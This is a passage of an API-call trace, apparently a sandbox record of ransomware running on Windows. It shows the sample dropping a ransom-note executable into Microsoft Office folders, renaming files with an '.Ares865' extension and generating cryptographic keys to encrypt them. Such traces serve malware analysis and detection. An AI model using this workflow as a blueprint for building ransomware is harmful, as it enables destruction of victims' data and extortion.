hHeap=0x2b0000) returned 1 [0073.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA") returned 39 [0073.413] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\MEDIA" | out: lpString1="C:\\Program Files\\Microsoft Office\\MEDIA") returned="C:\\Program Files\\Microsoft Office\\MEDIA" [0073.413] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.413] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\media\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.417] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.417] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d43ba00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d43ba00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.417] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.417] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.417] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14") returned="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14" [0073.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4780 | out: hHeap=0x2b0000) returned 1 [0073.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0073.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14") returned 48 [0073.417] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14" | out: lpString1="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14") returned="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14" [0073.417] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.417] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\media\\office14\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.422] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.422] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d43ba00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d43ba00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.423] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.423] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.423] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" [0073.423] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0073.423] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0073.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 54 [0073.423] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: lpString1="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" [0073.423] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.423] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.428] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.428] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5178e0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5d461b60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d461b60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.429] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.429] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.431] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" [0073.431] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1408 | out: hHeap=0x2b0000) returned 1 [0073.431] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0073.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 56 [0073.431] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: lpString1="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" [0073.431] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.431] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.437] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.437] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5178e0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5d461b60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d461b60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.437] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.437] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.443] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" [0073.443] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0073.443] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0073.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 57 [0073.443] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: lpString1="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" [0073.443] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.443] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.449] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.449] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5d487cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d487cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.449] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.449] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.451] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033") returned="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033" [0073.452] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0073.452] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0073.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033") returned 53 [0073.452] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033" | out: lpString1="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033") returned="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033" [0073.452] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.452] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.456] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.456] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d487cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d487cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.456] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.456] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.456] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" [0073.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0073.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0073.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 48 [0073.456] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: lpString1="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" [0073.456] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.456] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.461] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.461] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d4ade20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d4ade20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.461] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.461] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.466] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033") returned="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033" [0073.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0073.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0073.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033") returned 53 [0073.466] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033" | out: lpString1="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033") returned="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033" [0073.466] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.466] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.470] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.470] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5d4ade20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d4ade20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.470] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.470] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.470] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Document Themes 14", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Document Themes 14") returned="C:\\Program Files\\Microsoft Office\\Document Themes 14" [0073.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0073.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0073.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14") returned 52 [0073.471] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Document Themes 14" | out: lpString1="C:\\Program Files\\Microsoft Office\\Document Themes 14") returned="C:\\Program Files\\Microsoft Office\\Document Themes 14" [0073.471] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.471] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\document themes 14\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.476] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.476] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5d4d3f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d4d3f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.478] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.478] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.479] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" [0073.479] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0073.479] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0073.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 64 [0073.479] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: lpString1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" [0073.479] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.479] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.499] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.499] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528a9ed0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5d4d3f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d4d3f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.499] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.499] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.500] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Adjacency.xml.Ares865") returned 86 [0073.500] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Adjacency.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\adjacency.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Adjacency.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\adjacency.xml.ares865"), dwFlags=0x1) returned 1 [0073.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Adjacency.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\adjacency.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.501] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3609) returned 1 [0073.501] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.502] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.502] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.505] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.506] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.506] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.506] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Angles.xml.Ares865") returned 83 [0073.506] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Angles.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\angles.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Angles.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\angles.xml.ares865"), dwFlags=0x1) returned 1 [0073.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Angles.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\angles.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.507] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3626) returned 1 [0073.507] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0073.508] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.508] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.510] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0073.511] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.511] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0073.511] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apex.xml.Ares865") returned 81 [0073.511] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apex.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\apex.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Apex.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\apex.xml.ares865"), dwFlags=0x1) returned 1 